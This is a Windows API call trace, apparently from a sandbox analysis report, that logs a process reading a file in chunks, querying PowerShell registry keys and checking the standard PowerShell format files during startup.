	[0649.784] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.784] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.785] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.785] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.785] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.785] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.785] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.787] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.787] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.788] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.788] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.788] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.789] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.789] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.789] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.792] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.793] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.793] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.793] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.794] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.794] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.794] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.795] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.795] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.795] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.795] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.796] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.796] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.796] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.797] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.797] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.802] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.802] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.802] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.803] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.803] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.803] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.804] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.804] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1000, lpOverlapped=0x0) returned 1
	[0649.804] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x1b4, lpOverlapped=0x0) returned 1
	[0649.804] ReadFile (in: hFile=0x310, lpBuffer=0x2dc51c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d188, lpOverlapped=0x0 | out: lpBuffer=0x2dc51c0*, lpNumberOfBytesRead=0x26d188*=0x0, lpOverlapped=0x0) returned 1
	[0649.805] CloseHandle (hObject=0x310) returned 1
	[0649.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0649.805] SetErrorMode (uMode=0x1) returned 0x1
	[0649.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d100 | out: lpFileInformation=0x26d100*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0649.805] SetErrorMode (uMode=0x1) returned 0x1
	[0650.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0650.021] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d1e8 | out: phkResult=0x26d1e8*=0x310) returned 0x0
	[0650.021] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d16c, lpData=0x0, lpcbData=0x26d168*=0x0 | out: lpType=0x26d16c*=0x1, lpData=0x0, lpcbData=0x26d168*=0x56) returned 0x0
	[0650.021] CoTaskMemAlloc (cb=0x5a) returned 0x145170
	[0650.021] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d13c, lpData=0x145170, lpcbData=0x26d138*=0x56 | out: lpType=0x26d13c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d138*=0x56) returned 0x0
	[0650.021] CoTaskMemFree (pv=0x145170) 
	[0650.021] RegCloseKey (hKey=0x310) returned 0x0
	[0650.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0650.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0658.292] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0660.099] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.515] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.516] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.517] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.518] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0661.520] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0664.748] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0664.749] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0664.751] VirtualQuery (in: lpAddress=0x26bed0, lpBuffer=0x26cd90, dwLength=0x30 | out: lpBuffer=0x26cd90*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0664.765] CoTaskMemAlloc (cb=0x104) returned 0x139d70
	[0664.765] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.765] CoTaskMemFree (pv=0x139d70) 
	[0666.599] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d388 | out: phkResult=0x26d388*=0x308) returned 0x0
	[0666.599] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d39c, lpData=0x0, lpcbData=0x26d398*=0x0 | out: lpType=0x26d39c*=0x1, lpData=0x0, lpcbData=0x26d398*=0x74) returned 0x0
	[0666.599] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d30c, lpData=0x0, lpcbData=0x26d308*=0x0 | out: lpType=0x26d30c*=0x1, lpData=0x0, lpcbData=0x26d308*=0x74) returned 0x0
	[0666.599] CoTaskMemAlloc (cb=0x78) returned 0xee830
	[0666.599] RegQueryValueExW (in: hKey=0x308, lpValueName="path", lpReserved=0x0, lpType=0x26d2dc, lpData=0xee830, lpcbData=0x26d2d8*=0x74 | out: lpType=0x26d2dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d2d8*=0x74) returned 0x0
	[0666.599] CoTaskMemFree (pv=0xee830) 
	[0666.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0666.600] SetErrorMode (uMode=0x1) returned 0x1
	[0666.600] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d260 | out: lpFileInformation=0x26d260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0666.600] SetErrorMode (uMode=0x1) returned 0x1
	[0666.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0666.601] SetErrorMode (uMode=0x1) returned 0x1
	[0666.601] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d260 | out: lpFileInformation=0x26d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0666.601] SetErrorMode (uMode=0x1) returned 0x1
	[0666.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0666.602] SetErrorMode (uMode=0x1) returned 0x1
	[0666.602] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d260 | out: lpFileInformation=0x26d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0666.602] SetErrorMode (uMode=0x1) returned 0x1
	[0666.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0666.602] SetErrorMode (uMode=0x1) returned 0x1
	[0666.602] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d260 | out: lpFileInformation=0x26d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0666.602] SetErrorMode (uMode=0x1) returned 0x1
	[0666.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0666.602] SetErrorMode (uMode=0x1) returned 0x1
	[0666.603] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d260 | out: lpFileInformation=0x26d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0666.603] SetErrorMode (uMode=0x1) returned 0x1
	[0666.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0666.603] SetErrorMode (uMode=0x1) returned 0x1
	[0666.603] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d260 | out: lpFileInformation=0x26d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0666.603] SetErrorMode (uMode=0x1) returned 0x1
	[0666.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0666.603] SetErrorMode (uMode=0x1) returned 0x1
	[0666.603] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d260 | out: lpFileInformation=0x26d260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0666.603] SetErrorMode (uMode=0x1) returned 0x1
	[0666.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26d050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0666.604] SetErrorMode (uMode=0x1) returned 0x1
